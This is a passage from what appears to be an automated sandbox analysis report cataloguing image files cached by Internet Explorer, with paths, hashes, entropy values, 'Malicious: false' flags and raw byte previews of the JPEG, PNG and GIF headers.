SHA-512:	8913638488FD250B34876A0ECD334351E34A7DEBCDEA938C33150D7A2D33B6F5C13CF3CE562685E22438556FEF3AA34AD4A34B49EFECDA7C23A3B419E12FB76F
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......n........=.9x.. 8,.A...Sl..t..........O.....................v...?.G.#.\|................>...{T..._..k......G..S6..]>...P....#...SWF....\|....p..s....R...'.. I=...t...A*.6.`..........(.4...<7w..?V_..P57..#._..e......;.V<xWR).Z...9..n...".......w..?...j..I.]....V.O~3....7..u..e...q.O.....hz..........fw..P6......-a..J...U..N.....o/-R.&.#.....\..EJ.ni.../......?.Y.LJ.d

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AAPabaD[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
Category:	dropped
Size (bytes):	7987
Entropy (8bit):	7.899866839935912
Encrypted:	false
SSDEEP:	192:QnI6+XrIqJpK6dGAoI6SQKc36kiPBK0to/zzqCKITBCC:0ILXI6jonMnh5KhfqvC
MD5:	1FBD3B6CE82EF177A6B7FE8FC9DE618A
SHA1:	218B5B18E14D9AF1C668CB8DC1BEC60143575C4D
SHA-256:	9D18FC3D9A8EE908A5B8BFD790C1369081BDDE993D472A2B4A84D42AB55FFF99
SHA-512:	F70D2F3C3A3E232E7E1B99D4018627AA5BD986E095AE9C08B87A2198B20F031B0D1F22B659260FC16F24B6B21758781A0987F0EA0697E7C57E566E0D47E6AEC2
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..!.._J...-.Q..s..8.B...5Gz...<[s..eq.f....7.-\e......z............e,_q.D.&@..i...P....!.. ....j......@."#8 .R...-+...m...>.e.\.U`2k..'..X4.(....W-.Q.[.JRe..5.......,W.y2.~...RA.S..Z....!..?Z....0.U..0.}h..??.p).p.......\..W2......k0...T)4..)&f.Ds.Q.<d..X...q.ct...g4.MGa.H.\.X.'#w\.*.+.~.1.i.>.T.L.0F..j...j...N.f...........fG..M~.B>...)...`?..@......1o....8<.1.....?...x..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AAPafV9[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	dropped
Size (bytes):	17018
Entropy (8bit):	7.9365118526699225
Encrypted:	false
SSDEEP:	384:NaAVNf+52kVhGTYMVeAjLgIlJcCAmXTy4Hu0z7vz/UoQLLSNY0j2rKtRLMG:N/Pf+5AsSjLqCfX2HwbbU5LuND2yhMG
MD5:	E131425F6314BB3477252D1C0B8E1E5D
SHA1:	7C616951C2F9177C0EFD383E03C5E4431A117932
SHA-256:	DAC38C140ECD6929C53B3261A9815ECE4590FFFC4A1978DAA6E7186EDBB5A00C
SHA-512:	5AE126A340D3F0E32662A91B6A7C3BD4CE9EE3C74AB24BDF777E5534A41D383F90854E5BDC9C334C48D25BBACEEE06E735A852350FCCC530749D9C8575D2EBC4
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....z.\...A.j\lZ........&1.qRQ..5B..B`...h...... .P..{..H....j.K..4.&N.g.V&....T..2M0..q..-D3.K.4..Nk6Z.<...VE.$....\}..CN.Z.O. .....R...A$}p~.W..\f...v...1\2We"...$...S.kjp..M.Vz..Znx.......$..k.HIg..R....W.%8..........5R&CY..pi.@....a......D.\e.Fa.yk..SP...].#.P..4,....u....c....PqE...)....".d.k.#d=.T.E.C.!...4........"....5.BdC.5d.a.C.h.5....<...@...&q...@..r/..44ii....r

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AAPan0r[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	dropped
Size (bytes):	8790
Entropy (8bit):	7.935122036621206
Encrypted:	false
SSDEEP:	192:Qo2jydQK1Xv4yx4hNLMwjcTLNwOjcw7YxmmbTVZlV89XF9FqYZVqu8:b20QKFAyCMwWjTYx1h7ClMYZVqz
MD5:	2C372208990BAD62465CC7DB923775CA
SHA1:	D48457BC300AAFD1E04F7D4F4266EAA9B2608B72
SHA-256:	F02323AB8AC3F6534874B7E734FE31A7492B4B6F85BC3034FDA4062CA916D882
SHA-512:	B9350951997FE902A529515907C353DCC49BB1BD494939EA4114DAD775D334778ECE953EA1B1C176B30266DD45D9BC774FF2C20C15EEEC6EC66C43FB949AF4E8
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..uk.w~.O.(..;......-d1...G..L.M...y.J.ci.i.2...0.....Klr.H7.......Uh....I...<t]K.*.4S....,..z.I.V.vd....$.L...S.H. ..#.HC...CM..."b.......qJ.\|...(...L...ZB....@.&.42.8...\....5D..'e...........uM ..b..U.i\..h...;.Y....l...D.i\.!.}.@.w.4.Q-.#._.H..1.@.%!...J.bt.4..\.). `3..F.......X`..[.9.....j.C.8UmL=SQ......vD..........A..`........F...i...9..._B..#.J..C/C..Tks..-

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AAParbZ[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	dropped
Size (bytes):	17041
Entropy (8bit):	7.867069630214809
Encrypted:	false
SSDEEP:	384:NAaWvVA0JBYbO2y3IzZfj4jmqAqtReM7TsU+Rf4HpD3hUNe8T:NidjBYa2s4tjACqsfRfIpDuN5
MD5:	AC291D55B17D4022FA50ABB12AFA2E04
SHA1:	7CFB8326444F6AC631453D7AE284BDF20DCB6165
SHA-256:	5095E33A48FB3E567F60797D20FCE5E6107C2964D4497817ADBCA37E8B3AC53F
SHA-512:	1DDEB0622E99E79DAFD7FDDD4CE5D994E558347E32345B088A66E41A73A16A6DB60442885E7A3DF473ED585A07AFCC578A8C2090EE021D019905A3843B97F039
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j..=(..P.H.........&(.....P...(."....P(....P..@..4..b....v).......(.1@......\P...\S.1@.).b..S....(...#..8P..@."....\P...1@.(....s@.(.(.q@......(Z........(..P...(..."..h.........P..h.....1H....i..P........(...P.b....b..(....P.b..P...&(.@........&(.. .P...7....kh.X,......!.."....b....P(.@.........\P.b....p..m..6.....h.6. ......@.(.b.....P..@. ....(......(.. ....(z..].}.<2:7..2=.qQ.tB

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\AArXDyz[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	472
Entropy (8bit):	7.428434836975685
Encrypted:	false
SSDEEP:	12:6v/7gL/VnYyOrLr4giGytVy6R4jsnwPH7XXc:5w7tLCbMswfbs
MD5:	CBC872F95E97A2E9BEE6A358853D5C5E
SHA1:	2AA08D0C3410C2B1DACC4E7AE45FCEC2FFD8A5F7
SHA-256:	64CA26EAA923C9838A551835B8824D055D16484476E00BB260D56F2E801FBA2A
SHA-512:	39F09466D3061EB107B5072FD5FB2B2B10FDE17D1BFC79E7C3DB79D3330D327FA439543F9EDE6E2598E0BD32424634B7A327A18E1F95AD36F77DF9CC9C707DA5
Malicious:	false
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx..J+A......1...jX.......'P.....\|._ .V...6..E..^.....I..&....qS....v........8../.7.0..U...w.>.g......Q..7../..[. ....=......m..+k:..#...m.-. ..t......n.....F.]8..B..s..S..@.......\.H.L...Z. ..q.z[VQ.Z.........^..d.P..........Z.i..b.....0.;u...q..q.gH$,H....J..a...u!..W~....d..o.._...c2vM.S..s.d.'....F.X<.....<e...c..B..d...Z..n........=.X..8.?..?..Xy......?.......Z.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB14EN7h[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	dropped
Size (bytes):	13764
Entropy (8bit):	7.273450351118404
Encrypted:	false
SSDEEP:	384:IfOm4cIa37nstlEM15mv7OAkrIh4McOD07+8n0GoJdxFhEh8:I2m4pa37stlTgqAjS0GoJd3yK
MD5:	DA6531188AED539AF6EAA0F89912AACF
SHA1:	602244816EA22CBE39BBD4DB386519908745D45C
SHA-256:	C719BE5FFC45680FE2A18CDB129E60A48A27A6666231636378918B4344F149F7
SHA-512:	DF03FA1CB6ED0D1FFAC5FB5F2BB6523D373AC4A67CEE1AAF07E0DA61E3F19E7AF43673B6BEFE7192648AC2531EF64F6B4F93F941BF014ED2791FA6F46720C7DB
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......5.D..gJ.ks@..(...@.........l..pE..iT...t&..V.M..h....4.m.-.!....:..............a...CQ...c....Fj....F(...5 ..<.....J..E.0."..].6...B.K........k.t.A'p..KJ..A....(......(......(......(......(......(......(......(......(.......K1......:...0......I...M.9..n..d.Z.e.Q..HfE....l^...h.h.t....(.9:.2....z...@.....:...3..w.@.P4Ac1.a.@...A#.P1... ..4..@.@.(.h.h.(....0....Y..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB14hq0P[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	dropped
Size (bytes):	19135
Entropy (8bit):	7.696449301996147
Encrypted:	false
SSDEEP:	384:IHtFIzAsGkT2tP9ah048vTWjczBRfCghSyOaWLxyAy3FN5GU643lb1y6N0:INFIFTsEG46SjcbmaWLsR3FNY/Ayz
MD5:	01269B6BB16F7D4753894C9DC4E35D8C
SHA1:	B3EBFE430E1BBC0C951F6B7FB5662FEB69F53DEE
SHA-256:	D3E92DB7FBE8DF1B9EA32892AD81853065AD2A68C80C50FB335363A5F24D227D
SHA-512:	0AF92FBC8D3E06C3F82C6BA1DE0652706CA977ED10EEB664AE49DD4ADA3063119D194146F2B6D643F633D48AE7A841A14751F56CC41755B813B9C4A33B82E45C
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..h.h........(.h........(.h......Z.(........(.h........TNY...W....q@..~..<..h.....dG.@.........F....L.@%}.....-K.F.9...c..O.7X9u,%.k.4..4..c.<p"...cp.-...U.J.n2..9.b.d.SphR.\V.5Q-./.LV.6...HM.V.d^E...F.q.*+7..a.m..VOA..qR.X.rx5&.(..Q..P.R..x..WM-.?........V..GTi.(.(........(........J.(.(......J.(........Z.(........Z.(........Z.(........(.h.......i..H.@...;..Y...q...0.<e+.B...[.v..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1aQdUI[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
Category:	dropped
Size (bytes):	21740
Entropy (8bit):	7.967255073496721
Encrypted:	false
SSDEEP:	384:+26ZK8NF5MKnz8CspA+kT45CuikmqoUQzNaeG38JzcLuolg8t7tTs9vlDmOD0:+2ANotCOCDLq1gMeG8eu58B6VmOD0
MD5:	6A41DDCCFCE2727C69F77CF2967FDFAA
SHA1:	01064AB1C07A692761494FF84752285A866DDB25
SHA-256:	8DD94175599119A426CDD21FD84B96D54B208FF04194A99EF49C7345710DE6D8
SHA-512:	69280F16BFAC393FA4DF0B03A9CE04655FCCB629FA86FC608DD920754B43B8AEFFD68FBEDBAB2E6BECB8CEEE12B5085AA748ADA58A9DCC66DB43EB646516138D
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(.......j..6...@.V.....de...._j...0..IbVI.......I...Wp\@..\|.\|...P..m&....^......H?..`2.D....v...<.\|..G.'....yaen-.."..H...o.. ..N....eia..\|.,&Q,e..P........eig..KL....6\.*{zd.(.S..\|Amd..Z].h.#............sq(.i.'c.d..U+.."+.>+MT.....p..!....1..NK}Y.........<.......H....)....#;..A....\.mE}.>-....n..(#..f%.I.#..z.`......u......#.S.c.-./...W......9../.X.........\hSZY..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1cG73h[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1131
Entropy (8bit):	7.767634475904567
Encrypted:	false
SSDEEP:	24:lGH0pUewXx5mbpLxMkes8rZDN+HFlCwUntvB:JCY9xr4rZDEFC
MD5:	D1495662336B0F1575134D32AF5D670A
SHA1:	EF841C80BB68056D4EF872C3815B33F147CA31A8
SHA-256:	8AD6ADB61B38AFF497F2EEB25D22DB30F25DE67D97A61DC6B050BB40A09ACD76
SHA-512:	964EE15CDC096A75B03F04E532F3AA5DCBCB622DE5E4B7E765FB4DE58FF93F12C1B49A647DA945B38A647233256F90FB71E699F65EE289C8B5857A73A7E6AAC6
Malicious:	false
Preview:	.PNG........IHDR................U....pHYs..........+......IDATx..U=l.E.~3;w{..#].Dg!.SD...p...E....PEJ.......B4.RE. :h..B.0.-$.D"Q 8.(.;.r.{3...d...G......7o..9....vQ.+...Q......."!#I......x\|...\...& .T6..~......Mr.d.....K..&..}.m.c.....`.`....AAA..,.F.?.v..Zk;...G...r7!..z......^K...z.........y...._..E..S....!$...0...u.-.Yp...@;;;%BQa.j..A.<)..k..N.....9.?..]t.Y.`....o....[.~~..u.sX.L..tN..m1...u...........Ic....,7..(..&...t.Ka.]..,.T..g.."...W......q....:+t.?6....A..}...3h.BM/.......<.~..A.`m...:.....H...7.....{.....$... AL..^-...?5FA7'q..8jue........?A...v..0...aS.:.0.%.%"......[.=a......X..j..<725.C..@.\. ..`.._....'...=....+.Sz.{......JK.A...C\|{.\|r.$.=Y.#5.K6.!........d.G...{......$.-D.z..{...@.!d.e...&..o...$Y...v.1.....w..(U...iyWg.$...\>..].N...L.n=.[.....QeVe..&h...`;=.w.e9..}a=.......(.A&..#.jM~4.1.sH.%...h...Z2".........RP....&.3................a..&.I...y.m...XJK..'...a......!.d.......Tf.yLo8.+.+...KcZ.....\|K..T....vd....cH.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1ftEY0[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	497
Entropy (8bit):	7.316910976448212
Encrypted:	false
SSDEEP:	12:6v/7YEtTvpTjO7q/cW7Xt3T4kL+JxK0ew3Jw61:rEtTRTj/XtjNSJMkJw61
MD5:	7FBE5C45678D25895F86E36149E83534
SHA1:	173D85747B8724B1C78ABB8223542C2D741F77A9
SHA-256:	9E32BF7E8805F283D02E5976C2894072AC37687E3C7090552529C9F8EF4DB7C6
SHA-512:	E9DE94C6F18C3E013AB0FF1D3FF318F4111BAF2F4B6645F1E90E5433689B9AE522AE3A899975EAA0AECA14A7D042F6DF1A265BA8BC4B7F73847B585E3C12C262
Malicious:	false
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx....N.A..=.....bC...RR..`'......v.{:.^..... ."1.2....P..p.....nA......o.....1...N4.9.>..8....g.,...\|."...nL.#..vQ.......C.D8.D.0.DR)....kl..\|.......m...T..=.tz...E..y..... ..S.i>O.x.l4p~w......{...U..S....w<.;.A3...R..F..S1..j..%...1.\|.3.mG..... f+.,x....5.e..]lz...).1W..Y(..L`.J...xx.y{..\. ...L..D..\N........g..W...}w:.......@].j._$.LB.U..w'..S......R..:.^..[\.^@....j...t...?..<.............M..r..h....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1kvzy[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1100
Entropy (8bit):	7.749452105424938
Encrypted:	false
SSDEEP:	12:6v/7eZ3IqhrinW+y2UXaxTaJgfcoG7QKJ7OZfhL3cp1pW2krS7BiArfss7P7UIQb:jVT2aCTjG8MOZR372/7iU7UIylHdLN
MD5:	C6E13630360E0B6D880AFDF3CD2A2204
SHA1:	63DCA80F76834F5A3FBE79F661678375239F72A4
SHA-256:	49767874BCF0F0648266F3018B5CCE3CA539B85778E5395D1212ACB114287D65
SHA-512:	CB8F7629DA131226146B12119C06A846A2EC9E9D069711711AC50CD7F31E321144E39270E82EA693E2FE9BFD1634841BF450173807AB6607794E2AF0EBE832C8
Malicious:	false
Preview:	.PNG........IHDR.............;0......pHYs..........+......IDATx..}H.u....m..rR>..9#--o........[E1..kWB.#.],\F.8X.....\.&.......x.....y.b..p...z}~y..9....^..\|.>....{I.?.;.......:.Uw.\|...e.(......r..Wc7Zq...F....N.O.}.n...^X..$.q...&.%.....X....9d{.>...)..8..A...}.x#....K... z~$...4Y...<....)`..p....qr<arhwa.zY.Yq..$.<.....H...~...H\|..G...@\|./.8G.L..M...U..I...]..r(.s.."f..I...Q..b.x..MYd.D^.mg.G .H.........=Ot.v.D._..6.[o.7L.....d./B)l....d.....u.....mqB.J.........4(R...........".dSj.....{.gB.<...gdT....u~.?`.X.&&&N...\|.R..0..O.yV~./..; ..\.X[P....[...1y+++M...J../.+...}>_mooo...~ohh....`l......R..."...`......8...aeP...oL..f~n..m0..tY2.N.rrrT]].JKKk`"...Kw.i......\|............['<...bHM).....%;..=..D.s.......CN.........Y.,..l.<...s$...v.=5....N..E.YYYjzzZ..A...+]ohIII...L?<<\|....}&q...].vM..?. ...+....m.....}6....\|i.e+..Vf.........V.@...3.d......cRv.f...E%G..Xvv......ru...~..j......\..f......\|m,//O..B....D...zUU....Z.kfccc..."..V\__...+**R.B..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BBJrII1[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	285
Entropy (8bit):	6.817753121237528
Encrypted:	false
SSDEEP:	6:6v/lhPahmCsuNR/8GxYbIi9BfLlNN0lgpmPuoEGXn1S/NmredEGWcqp:6v/7wz0Gx2v8lgpmn1GDdgp
MD5:	815BC0B491D1C2229AA6AF07F213CAB5
SHA1:	E7F9F38CE6E310209CEC1F291D398AA499CFB64D
SHA-256:	2705097C373E4DE9A34E02C575A3D86854FCDD08365DA79F93525E68F562917A
SHA-512:	3B87F4003BE22584D59B301C89FE5B09E16B27126E3A8E90C4DCFD8AB94052A17AEFE7D75443151A48757031033A92077BA603BE01E1A199BC8727B8E0593DC9
Malicious:	false
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx...-..`....].,.b.4h.*~....h2.,v?.`2..2.f.f....2."8A..I..O..;.q....c..<..@)......y..t...-r....{...u.}$....0qF.3..F.]..8C.!....K..FL0.4...29.....2..c..4(.D....S.PE.=,...,,..s._P.)....C../....e.O.7P...f3.!......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BBPfCZL[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 50 x 50
Category:	dropped
Size (bytes):	2313
Entropy (8bit):	7.594679301225926
Encrypted:	false
SSDEEP:	48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
MD5:	59DAB7927838DE6A39856EED1495701B
SHA1:	A80734C857BFF8FF159C1879A041C6EA2329A1FA
SHA-256:	544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
SHA-512:	7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
Malicious:	false
Preview:	GIF89a2.2.....7..;..?..C..I..H..<..9.....8..F..7..E..@..C..@..6..9..8..J..z.G..>..?..A..6..>..8..:..A..=..B..4..B..D..=..K..=..@..<..:..3~.B..D.....,\|.4..2..6..:..J..;..G....Fl..1}.4..R.....Y..E..>..9..5..X..A..2..P..J../\|.9.....T.+Z.....+..<.Fq.Gn..V..;..7.Lr..W..C..<.Fp.]......A.....0{.L..E..H..@.....3..3..O..M..K....#[.3i..D..>........I....<n..;..Z..1..G..8..E....Hu..1..>..T..a.Fs..C..8..0}....;..6..t.Ft..5.Bi..:.x...E.....'z^~.......[....8`..........;..@..B.....7.....<.................F.....6...........>..?.n......g.......s...)a.Cm....'a.0Z..7....3f..<.:e.....@.q.....Ds..B....!P.n...J............Li..=......F.....B.....:r....w..\|..........`..[}.g...J.Ms..K.Ft.....'..>..........Ry.Nv.n..]..Bl........S..;....Dj.....=.....O.y.......6..J.......)V..g..5.......!..NETSCAPE2.0.....!...d...,....2.2........3.`..9.(\|.d.C .wH.(."D...(D.....d.Y......<.(PP.F...dL.@.&.28..$1S....TP......>...L..!T.X!.(..@a..IsgM..\|..Jc(Q.+.......2.:.)y2.J......W,..eW2.!....!....C.....d...zeh....P.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\cfdbd9[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	740
Entropy (8bit):	7.552939906140702
Encrypted:	false
SSDEEP:	12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
MD5:	FE5E6684967766FF6A8AC57500502910
SHA1:	3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
SHA-256:	3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
SHA-512:	AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
Malicious:	false
Preview:	.PNG........IHDR................U....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..\|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\http___cdn.taboola.com_libtrc_static_thumbnails_b3b730df929ed7084f256b53000dc655[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	dropped
Size (bytes):	20805
Entropy (8bit):	7.958583012961481
Encrypted:	false
SSDEEP:	384:qYG1LoUYYUqI7s6G16hfWRskw4xjpfLVAMSDI5wuF7aW13FVfGhc62RaGv3mxkK:ZG1ULcGfWRTVxjRLVAMSM5w87aW13FCn
MD5:	54E1A089C81AC4733C601033B8173199
SHA1:	C6D1B62F4C75E00ED06F81929D336DBDE62A1920
SHA-256:	91D8484713E50908FAD575102FE050DEFF04FF84BCB8760C761BBB581DE976C7
SHA-512:	7A15D869B2351A443F313ECD01EE37C33778827553D88DA7C15D8B0B7B1A1FB3A0B3CF2EDA5A8FF9D4AC3FA2AAD906785188A9743F450AF3E9593CD6071151F1
Malicious:	false
Preview:	......JFIF.......................................................... .... %...%-))-969KKd...............................!..!..)1(%(1)I9339ITGCGTf[[f.z..........7...............6.........................................................................................................;.............D.]....B}P..........xc5<I.<{.m................._"XKu....h.#y&..........r!p.JF...7n.+}.Y.+}'V.........%u.]..cv.N..{k..Wx.X.D.........I.6..+38.6..Em..I....dw....r.#....OSj.z.....E(...3pI<.7.-~...~.L6...'r......<.n.#...dL~.....-........tY..ak...^T,..........[.a...n....EF.....gx...x...f..0t..b.:.Ku)]f............,..S.J......T.9w...;:K.....F..V.k.e.G...u..c..L*.\|S.gk.X.}y}J.@..u.E......5.'...K2u].&...t... ^.^].uw.&...nP..~3...S...c.....>n..X..F.w..vF_....'8..b.... .u...]....u......x...>sy.<...o...;.M..?..fU....=..I....-..Mc..m.A.L..4...I.=.......>y..9....+;.C_hv...........>..~.....tOm#6..J...7.]....&..h7....g:a..[z]..cP...?.zz..G....Z.T..rp./r...^ ..Yw..5v..S4

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\http___cdn.taboola.com_libtrc_static_thumbnails_ceedb38b7c05f6380193a62666745514[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
